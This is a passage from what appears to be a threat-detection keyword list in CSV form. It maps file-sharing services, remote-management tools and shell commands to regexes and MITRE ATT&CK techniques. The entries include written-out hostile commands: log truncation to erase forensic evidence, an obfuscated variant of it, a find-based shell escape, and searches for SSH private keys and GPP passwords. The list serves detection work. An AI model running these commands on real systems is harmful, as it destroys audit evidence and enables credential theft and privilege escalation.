TA0005","N/A","N/A","C2","https://github.com/beyondcode/expose","1","0","N/A","N/A","10","10","4207","260","2024-07-21T19:29:39Z","2020-04-14T19:18:38Z" "*'host' => 'sharedwithexpose.com'*",".{0,1000}\'host\'\s\=\>\s\'sharedwithexpose\.com\'.{0,1000}","greyware_tool_keyword","expose","tunneling service - written in pure PHP","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/beyondcode/expose","1","0","N/A","N/A","10","10","4207","260","2024-07-21T19:29:39Z","2020-04-14T19:18:38Z" "*http://127.0.0.1:4040/api/logs/*",".{0,1000}http\:\/\/127\.0\.0\.1\:4040\/api\/logs\/.{0,1000}","greyware_tool_keyword","expose","tunneling service - written in pure PHP","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/beyondcode/expose","1","1","N/A","N/A","10","10","4207","260","2024-07-21T19:29:39Z","2020-04-14T19:18:38Z" "*https://expose.dev/api/servers*",".{0,1000}https\:\/\/expose\.dev\/api\/servers.{0,1000}","greyware_tool_keyword","expose","tunneling service - written in pure PHP","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/beyondcode/expose","1","1","N/A","N/A","10","10","4207","260","2024-07-21T19:29:39Z","2020-04-14T19:18:38Z" "*https://expose.dev/register*",".{0,1000}https\:\/\/expose\.dev\/register.{0,1000}","greyware_tool_keyword","expose","tunneling service - written in pure PHP","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/beyondcode/expose","1","1","N/A","N/A","10","10","4207","260","2024-07-21T19:29:39Z","2020-04-14T19:18:38Z" "*fgddmllnllkalaagkghckoinaemmogpe*",".{0,1000}fgddmllnllkalaagkghckoinaemmogpe.{0,1000}","greyware_tool_keyword","ExpressVPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*jedieiamjmoflcknjdjhpieklepfglin*",".{0,1000}jedieiamjmoflcknjdjhpieklepfglin.{0,1000}","greyware_tool_keyword","FastestVPN Proxy","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data 
Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*bblcccknbdbplgmdjnnikffefhdlobhp*",".{0,1000}bblcccknbdbplgmdjnnikffefhdlobhp.{0,1000}","greyware_tool_keyword","FastStunnel VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*https://*.fex.net/download/*",".{0,1000}https\:\/\/.{0,1000}\.fex\.net\/download\/.{0,1000}","greyware_tool_keyword","fex.net","hosting service abused by attackers","T1583.003 - T1071 - T1102","TA0010 - TA0005 - TA0009","N/A","N/A","Collection","https://fex.net","1","1","N/A","downloading a file","10","10","N/A","N/A","N/A","N/A" "*https://*.fex.net/upload/*",".{0,1000}https\:\/\/.{0,1000}\.fex\.net\/upload\/.{0,1000}","greyware_tool_keyword","fex.net","hosting service abused by attackers","T1583.003 - T1071 - T1102","TA0010 - TA0005 - TA0009","N/A","N/A","Data Exfiltration","https://fex.net","1","1","N/A","uploading a file","10","10","N/A","N/A","N/A","N/A" "*https://api.fex.net/api/v1/anonymous/file*",".{0,1000}https\:\/\/api\.fex\.net\/api\/v1\/anonymous\/file.{0,1000}","greyware_tool_keyword","fex.net","hosting service abused by attackers","T1583.003 - T1071 - T1102","TA0010 - TA0005 - TA0009","N/A","N/A","Data Exfiltration","https://fex.net","1","1","N/A","uploading a file","10","10","N/A","N/A","N/A","N/A" "*/download/fiddler/fiddler-everywhere-windows*",".{0,1000}\/download\/fiddler\/fiddler\-everywhere\-windows.{0,1000}","greyware_tool_keyword","fiddler","fiddler - capture https requests","T1056 - T1040 - 
T1557","TA0009 - TA0010","N/A","N/A","Collection","https://www.telerik.com/","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*/Fiddler Everywhere *.*.*.exe*",".{0,1000}\/Fiddler\sEverywhere\s.{0,1000}\..{0,1000}\..{0,1000}\.exe.{0,1000}","greyware_tool_keyword","fiddler","fiddler - capture https requests","T1056 - T1040 - T1557","TA0009 - TA0010","N/A","N/A","Collection","https://www.telerik.com/","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*\Fiddler Everywhere *.*.*.exe*",".{0,1000}\\Fiddler\sEverywhere\s.{0,1000}\..{0,1000}\..{0,1000}\.exe.{0,1000}","greyware_tool_keyword","fiddler","fiddler - capture https requests","T1056 - T1040 - T1557","TA0009 - TA0010","N/A","N/A","Collection","https://www.telerik.com/","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*https://www.telerik.com/download/fiddler/*",".{0,1000}https\:\/\/www\.telerik\.com\/download\/fiddler\/.{0,1000}","greyware_tool_keyword","fiddler","fiddler - capture https requests","T1056 - T1040 - T1557","TA0009 - TA0010","N/A","N/A","Collection","https://www.telerik.com/","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*https://file.io/*",".{0,1000}https\:\/\/file\.io\/.{0,1000}","greyware_tool_keyword","file.io","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Collection","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*https://file.io/?title=*",".{0,1000}https\:\/\/file\.io\/\?title\=.{0,1000}","greyware_tool_keyword","file.io","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data 
Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*filetransfer.io/upload/*",".{0,1000}filetransfer\.io\/upload\/.{0,1000}","greyware_tool_keyword","filetransfer.io","uploading to filetransfer.io","T1105 - T1021 - T1560.003 - T1071.001 - T1071.002","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://filetransfer.io","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/FileZilla_*_sponsored-setup.exe*",".{0,1000}\/FileZilla_.{0,1000}_sponsored\-setup\.exe.{0,1000}","greyware_tool_keyword","FileZilla","FileZilla admintool used by threat actors for persistence and data exfiltration","T1505 - T1041","TA0003 - TA0009 -TA0010","N/A","Akira - Karakurt - AvosLocker - LockBit - Nokoyawa - Diavol - Scattered Spider*","Data Exfiltration","https://filezilla-project.org/","1","1","N/A","PUA risk of legitimate usage","5","7","N/A","N/A","N/A","N/A" "*/FileZilla_Server_*.deb*",".{0,1000}\/FileZilla_Server_.{0,1000}\.deb.{0,1000}","greyware_tool_keyword","FileZilla","FileZilla admintool used by threat actors for persistence and data exfiltration","T1505 - T1041","TA0003 - TA0009 -TA0010","N/A","Akira - Karakurt - AvosLocker - LockBit - Nokoyawa - Diavol - Scattered Spider*","Data Exfiltration","https://filezilla-project.org/","1","1","N/A","PUA risk of legitimate usage","5","7","N/A","N/A","N/A","N/A" "*\FileZilla_*_sponsored-setup.exe*",".{0,1000}\\FileZilla_.{0,1000}_sponsored\-setup\.exe.{0,1000}","greyware_tool_keyword","FileZilla","FileZilla admintool used by threat actors for persistence and data exfiltration","T1505 - T1041","TA0003 - TA0009 -TA0010","N/A","Akira - Karakurt - AvosLocker - LockBit - Nokoyawa - Diavol - Scattered Spider*","Data Exfiltration","https://filezilla-project.org/","1","0","N/A","PUA risk of legitimate usage","5","7","N/A","N/A","N/A","N/A" 
"*\FILEZILLA_*_WIN64_SPONSO-*.pf*",".{0,1000}\\FILEZILLA_.{0,1000}_WIN64_SPONSO\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","FileZilla","FileZilla admintool used by threat actors for persistence and data exfiltration","T1505 - T1041","TA0003 - TA0009 -TA0010","N/A","Akira - Karakurt - AvosLocker - LockBit - Nokoyawa - Diavol - Scattered Spider*","Data Exfiltration","https://filezilla-project.org/","1","0","N/A","PUA risk of legitimate usage","8","9","N/A","N/A","N/A","N/A" "*\FileZilla_*-setup.exe*",".{0,1000}\\FileZilla_.{0,1000}\-setup\.exe.{0,1000}","greyware_tool_keyword","FileZilla","FileZilla admintool used by threat actors for persistence and data exfiltration","T1505 - T1041","TA0003 - TA0009 -TA0010","N/A","Akira - Karakurt - AvosLocker - LockBit - Nokoyawa - Diavol - Scattered Spider*","Data Exfiltration","https://filezilla-project.org/","1","0","N/A","PUA risk of legitimate usage","5","7","N/A","N/A","N/A","N/A" "*\FileZilla_Server_*",".{0,1000}\\FileZilla_Server_.{0,1000}","greyware_tool_keyword","FileZilla","FileZilla admintool used by threat actors for persistence and data exfiltration","T1505 - T1041","TA0003 - TA0009 -TA0010","N/A","Akira - Karakurt - AvosLocker - LockBit - Nokoyawa - Diavol - Scattered Spider*","Data Exfiltration","https://filezilla-project.org/","1","0","N/A","PUA risk of legitimate usage","5","7","N/A","N/A","N/A","N/A" "*\Program Files\FileZilla FTP Client\*",".{0,1000}\\Program\sFiles\\FileZilla\sFTP\sClient\\.{0,1000}","greyware_tool_keyword","FileZilla","FileZilla admintool used by threat actors for persistence and data exfiltration","T1505 - T1041","TA0003 - TA0009 -TA0010","N/A","Akira - Karakurt - AvosLocker - LockBit - Nokoyawa - Diavol - Scattered Spider*","Data Exfiltration","https://filezilla-project.org/","1","0","N/A","PUA risk of legitimate usage","5","7","N/A","N/A","N/A","N/A" "*\Program Files\FileZilla 
Server*",".{0,1000}\\Program\sFiles\\FileZilla\sServer.{0,1000}","greyware_tool_keyword","FileZilla","FileZilla admintool used by threat actors for persistence and data exfiltration","T1505 - T1041","TA0003 - TA0009 -TA0010","N/A","Akira - Karakurt - AvosLocker - LockBit - Nokoyawa - Diavol - Scattered Spider*","Data Exfiltration","https://filezilla-project.org/","1","0","N/A","PUA risk of legitimate usage","5","7","N/A","N/A","N/A","N/A" "*\Software\WOW6432Node\FileZilla Client*",".{0,1000}\\Software\\WOW6432Node\\FileZilla\sClient.{0,1000}","greyware_tool_keyword","FileZilla","FileZilla admintool used by threat actors for persistence and data exfiltration","T1505 - T1041","TA0003 - TA0009 -TA0010","N/A","Akira - Karakurt - AvosLocker - LockBit - Nokoyawa - Diavol - Scattered Spider*","Data Exfiltration","https://filezilla-project.org/","1","0","#registry","PUA risk of legitimate usage","5","7","N/A","N/A","N/A","N/A" "*>FileZilla FTP Client<*",".{0,1000}\>FileZilla\sFTP\sClient\<.{0,1000}","greyware_tool_keyword","FileZilla","FileZilla admintool used by threat actors for persistence and data exfiltration","T1505 - T1041","TA0003 - TA0009 -TA0010","N/A","Akira - Karakurt - AvosLocker - LockBit - Nokoyawa - Diavol - Scattered Spider*","Data Exfiltration","https://filezilla-project.org/","1","0","#productname","PUA risk of legitimate usage","5","7","N/A","N/A","N/A","N/A" "*>FileZilla Server<*",".{0,1000}\>FileZilla\sServer\<.{0,1000}","greyware_tool_keyword","FileZilla","FileZilla admintool used by threat actors for persistence and data exfiltration","T1505 - T1041","TA0003 - TA0009 -TA0010","N/A","Akira - Karakurt - AvosLocker - LockBit - Nokoyawa - Diavol - Scattered Spider*","Data Exfiltration","https://filezilla-project.org/","1","0","#productname","PUA risk of legitimate usage","5","7","N/A","N/A","N/A","N/A" "*download.filezilla-project.org*",".{0,1000}download\.filezilla\-project\.org.{0,1000}","greyware_tool_keyword","FileZilla","FileZilla admintool used by 
threat actors for persistence and data exfiltration","T1505 - T1041","TA0003 - TA0009 -TA0010","N/A","Akira - Karakurt - AvosLocker - LockBit - Nokoyawa - Diavol - Scattered Spider*","Data Exfiltration","https://filezilla-project.org/","1","1","N/A","PUA risk of legitimate usage","5","7","N/A","N/A","N/A","N/A" "*Software\FileZilla*",".{0,1000}Software\\FileZilla.{0,1000}","greyware_tool_keyword","FileZilla","FileZilla admintool used by threat actors for persistence and data exfiltration","T1505 - T1041","TA0003 - TA0009 -TA0010","N/A","Akira - Karakurt - AvosLocker - LockBit - Nokoyawa - Diavol - Scattered Spider*","Data Exfiltration","https://filezilla-project.org/","1","0","N/A","PUA risk of legitimate usage","5","7","N/A","N/A","N/A","N/A" "*Win32/FileZilla_BundleInstaller*",".{0,1000}Win32\/FileZilla_BundleInstaller.{0,1000}","greyware_tool_keyword","FileZilla","FileZilla admintool used by threat actors for persistence and data exfiltration","T1505 - T1041","TA0003 - TA0009 -TA0010","N/A","Akira - Karakurt - AvosLocker - LockBit - Nokoyawa - Diavol - Scattered Spider*","Data Exfiltration","https://filezilla-project.org/","1","0","N/A","PUA risk of legitimate usage","8","9","N/A","N/A","N/A","N/A" "*/???/???/f?n? /var/log -type f -exec /???/???/tr?????e -s 0 {} \*",".{0,1000}\/\?\?\?\/\?\?\?\/f\?n\?\s\/var\/log\s\-type\sf\s\-exec\s\/\?\?\?\/\?\?\?\/tr\?\?\?\?\?e\s\-s\s0\s\{\}\s\\.{0,1000}","greyware_tool_keyword","find","truncate every file under /var/log to size 0 - no log content = no forensic.","T1486 - T1553 - T1592.002 - T1081","TA0005 - TA0007 - TA0009","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*dir /a C:\pagefile.sys | findstr /R *",".{0,1000}dir\s\/a\sC\:\\pagefile\.sys\s\|\sfindstr\s\/R\s.{0,1000}","greyware_tool_keyword","find","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). 
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z" "*find . -exec /bin/sh \; -quit*",".{0,1000}find\s\.\s\-exec\s\/bin\/sh\s\\\;\s\-quit.{0,1000}","greyware_tool_keyword","find","It can be used to break out from restricted environments by spawning an interactive system shell.","T1059.004 - T1219 - T1027","TA0002 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*find / -name authorized_keys *> /dev/null*",".{0,1000}find\s\/\s\-name\sauthorized_keys\s.{0,1000}\>\s\/dev\/null.{0,1000}","greyware_tool_keyword","find","Find sensitive files","T1083 - T1213.002 - T1005","TA0007 - TA0010","N/A","N/A","discovery","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*find / -name id_dsa 2>*",".{0,1000}find\s\/\s\-name\sid_dsa\s2\>.{0,1000}","greyware_tool_keyword","find","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*find / -name id_rsa *> /dev/null*",".{0,1000}find\s\/\s\-name\sid_rsa\s.{0,1000}\>\s\/dev\/null.{0,1000}","greyware_tool_keyword","find","Find sensitive files","T1083 - T1213.002 - T1005","TA0007 - TA0010","N/A","N/A","discovery","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*find / -name id_rsa 
2>*",".{0,1000}find\s\/\s\-name\sid_rsa\s2\>.{0,1000}","greyware_tool_keyword","find","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*find / -perm /2000 -ls 2>/dev/null*",".{0,1000}find\s\/\s\-perm\s\/2000\s\-ls\s2\>\/dev\/null.{0,1000}","greyware_tool_keyword","find","Find SGID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*find / -perm +4000 -type f 2>/dev/null*",".{0,1000}find\s\/\s\-perm\s\+4000\s\-type\sf\s2\>\/dev\/null.{0,1000}","greyware_tool_keyword","find","Find SUID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*find / -perm +8000 -ls 2>/dev/null*",".{0,1000}find\s\/\s\-perm\s\+8000\s\-ls\s2\>\/dev\/null.{0,1000}","greyware_tool_keyword","find","Find SGID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*find / -perm -2000",".{0,1000}find\s\/\s\-perm\s\-2000","greyware_tool_keyword","find","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.# sticky bits","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*find / -perm 
-4000",".{0,1000}find\s\/\s\-perm\s\-4000","greyware_tool_keyword","find","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.# sticky bits","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*find / -perm -4000 -type f *",".{0,1000}find\s\/\s\-perm\s\-4000\s\-type\sf\s.{0,1000}","greyware_tool_keyword","find","Find SUID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*find / -perm -g=s",".{0,1000}find\s\/\s\-perm\s\-g\=s","greyware_tool_keyword","find","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # sticky bits","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*find / -perm -u=s",".{0,1000}find\s\/\s\-perm\s\-u\=s","greyware_tool_keyword","find","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. 
sticky bits","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*find / -perm -u=s -type f 2>/dev/null*",".{0,1000}find\s\/\s\-perm\s\-u\=s\s\-type\sf\s2\>\/dev\/null.{0,1000}","greyware_tool_keyword","find","Find SUID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*find / -perm -u=s -type f -group */dev/null*",".{0,1000}find\s\/\s\-perm\s\-u\=s\s\-type\sf\s\-group\s.{0,1000}\/dev\/null.{0,1000}","greyware_tool_keyword","find","Find SUID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*find / -uid 0 -perm -4000 -type f *",".{0,1000}find\s\/\s\-uid\s0\s\-perm\s\-4000\s\-type\sf\s.{0,1000}","greyware_tool_keyword","find","Find SUID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*find / -user root -perm -6000 -type f 2>*",".{0,1000}find\s\/\s\-user\sroot\s\-perm\s\-6000\s\-type\sf\s2\>.{0,1000}","greyware_tool_keyword","find","linux commands abused by attackers - find sgid and suid sensitive perms","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*find /* -perm -04000 -o -perm -02000*",".{0,1000}find\s\/.{0,1000}\s\-perm\s\-04000\s\-o\s\-perm\s\-02000.{0,1000}","greyware_tool_keyword","find","linux commands abused by attackers - find sgid and suid 
sensitive perms","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*find /* -perm -u=s -type f 2>*",".{0,1000}find\s\/.{0,1000}\s\-perm\s\-u\=s\s\-type\sf\s2\>.{0,1000}","greyware_tool_keyword","find","linux commands abused by attackers - find sgid and suid sensitive perms","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*find /var/log -type f -exec truncate -s 0 {} \*",".{0,1000}find\s\/var\/log\s\-type\sf\s\-exec\struncate\s\-s\s0\s\{\}\s\\.{0,1000}","greyware_tool_keyword","find","truncate every file under /var/log to size 0 - no log content = no forensics.","T1486 - T1553 - T1592.002 - T1081","TA0005 - TA0007 - TA0009","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*findstr *cpassword *\sysvol\*.xml*",".{0,1000}findstr\s.{0,1000}cpassword\s.{0,1000}\\sysvol\\.{0,1000}\.xml.{0,1000}","greyware_tool_keyword","findstr","linux commands abused by attackers - gpp finder","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of false positives","6","10","N/A","N/A","N/A","N/A" "*findstr 
*vnc.ini*",".{0,1000}findstr\s.{0,1000}vnc\.ini.{0,1000}","greyware_tool_keyword","findstr","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of false positives","6","10","N/A","N/A","N/A","N/A" "*findstr /si secret *.docx*",".{0,1000}findstr\s\/si\ssecret\s.{0,1000}\.docx.{0,1000}","greyware_tool_keyword","findstr","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of false positives","6","10","N/A","N/A","N/A","N/A" "*agent.fleetdeck.io/*?win*",".{0,1000}agent\.fleetdeck\.io\/.{0,1000}\?win.{0,1000}","greyware_tool_keyword","fleetdeck","FleetDeck is a Remote Desktop & Virtual Terminal solution tailored for techs to manage large fleets of computers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://fleetdeck.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* install-fleetctl.sh*",".{0,1000}\sinstall\-fleetctl\.sh.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*.dev1.fleetdeck.io*",".{0,1000}\.dev1\.fleetdeck\.io.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*/.fleetctl/fleetctl*",".{0,1000}\/\.fleetctl\/fleetctl.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*/api/latest/fleet/mdm/bootstrap?token=*",".{0,1000}\/api\/latest\/fleet\/mdm\/bootstrap\?token\=.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*/api/v1/fleet/mdm/sso/callback*",".{0,1000}\/api\/v1\/fleet\/mdm\/sso\/callback.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*/etc/fleet/fleet.env*",".{0,1000}\/etc\/fleet\/fleet\.env.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*/fleet_v*_linux.tar.gz*",".{0,1000}\/fleet_v.{0,1000}_linux\.tar\.gz.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*/fleetd.crx*",".{0,1000}\/fleetd\.crx.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*/fleetdm/fleet/releases/download/*",".{0,1000}\/fleetdm\/fleet\/releases\/download\/.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*/fleetdm/fleet/releases/latest*",".{0,1000}\/fleetdm\/fleet\/releases\/latest.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*/install-fleetctl.sh*",".{0,1000}\/install\-fleetctl\.sh.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 